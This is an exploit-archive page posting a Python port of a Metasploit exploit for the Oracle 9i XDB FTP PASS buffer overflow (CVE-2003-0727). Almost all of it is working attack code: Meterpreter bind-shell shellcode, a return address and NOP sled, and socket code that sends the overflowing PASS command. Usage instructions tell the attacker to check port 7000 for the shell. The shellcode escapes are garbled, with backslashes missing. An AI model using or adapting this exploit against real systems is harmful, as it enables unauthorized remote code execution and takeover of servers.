Home / os / winmobile

Oracle 9i XDB FTP Pass Overflow

Posted on 03 February 2016

'''
Oracle 9i XDB FTP PASS Overflow (win32)
Ported to python from the Metasploit oracle9i_xdb_ftp_pass.rb exploit
Original exploit:
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb

Description from original exploit:
By passing an overly long string to the PASS command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
conference.
http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf

CVE: 2003-0727
OSVDB: 2449
BID: 8375

Date: 2/2/2016
Ported by: Tom Ryans
Tested on: Win 2000 SP4

Usage: oracle9i_ftp_pass.py target_ip target_port
 ex. oracle9i_ftp_pass.py 127.0.0.1 2100

Spawns meterpreter bind shell on port 7000.
'''

#!/usr/bin/python

import sys, socket

if len(sys.argv) != 3:
 print "Usage: %s target_ip target_port" % sys.argv[0]
 sys.exit()

host = str(sys.argv[1])
port = int(sys.argv[2])

#msfvenom -p windows/meterpreter/bind_tcp lport=7000 EXITFUNC=thread -b "x00x09x0ax0dx20x22x25x26x27x2bx2fx3ax3cx3ex3fx40" -f c
shellcode = (
"xdbxc8xd9x74x24xf4x5bx31xc9xb1x4bxbdxe8xe3x74"
"x4ex83xc3x04x31x6bx16x03x6bx16xe2x1dx1fx9cxcc"
"xddxe0x5dxb1x54x05x6cxf1x02x4dxdfxc1x41x03xec"
"xaax07xb0x67xdex8fxb7xc0x55xe9xf6xd1xc6xc9x99"
"x51x15x1dx7ax6bxd6x50x7bxacx0bx98x29x65x47x0e"
"xdex02x1dx92x55x58xb3x92x8ax29xb2xb3x1cx21xed"
"x13x9exe6x85x1axb8xebxa0xd5x33xdfx5fxe4x95x11"
"x9fx4axd8x9dx52x93x1cx19x8dxe6x54x59x30xf0xa2"
"x23xeex75x31x83x65x2dx9dx35xa9xabx56x39x06xb8"
"x31x5ex99x6dx4ax5ax12x90x9dxeax60xb6x39xb6x33"
"xd7x18x12x95xe8x7bxfdx4ax4cxf7x10x9exfdx5ax7d"
"x53xcfx64x7dxfbx58x16x4fxa4xf2xb0xe3x2dxdcx47"
"x03x04x98xd8xfaxa7xd8xf1x38xf3x88x69xe8x7cx43"
"x6ax15xa9xf9x61xb0x02x1fx88x28xa2xb5x71xc5x4e"
"x46xa9xf5x70x8dxc2x9ex8cx2dxf6x06x18xcbx62xa7"
"x4cx44x1bx05xabx5dxbcx76x99x24x82xfcx7ax71x6b"
"x48x93x45x94x49xb1xe2x02xc2xd6x37x32xd5xf2x10"
"x23x42x88xf0x06xf2x8dxd9xf3xf4x1bxe5x55xa2xb3"
"xe7x80x84x1bx18xe7x96x5cxe6x76xb4x17xd0xecx86"
"x4fx1cxe1x06x90x4ax6bx07xf8x2axcfx54x1dx35xda"
"xc8x8exa3xe5xb8x63x64x8ex46x5dx42x11xb8x88xd1"
"x56x46x4dxd2xa7x84x98x1axd2xe3x18")

user = "A" * 10
# return address from Metasploit module: 0x60616d46 oraclient9.dll (pop/pop/ret)
ret = "x46x6dx61x60"
prependencoder = "x81xc4xffxefxffxffx44" #from Metasploit module
nops = "x90" * (800 - len(shellcode) - len(prependencoder))

buff = "A" * 442 + "xebx06x90x90" + ret + nops + prependencoder + shellcode
print " ++++++++++++++++++++++++++++++++++++++++++++"
print " + Oracle 9i XDB FTP PASS Overflow exploit +"
print " +++++++++++++++++++++++++++++++++++++++++++++"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print "Sending %s size payload..." % len(buff)
s.send("USER " + user + "
")
s.send("PASS " + buff + "
")
print "Payload sent...."
print "Check port 7000 for meterpreter shell..."
s.close()

 

TOP

Malware :

Exploits :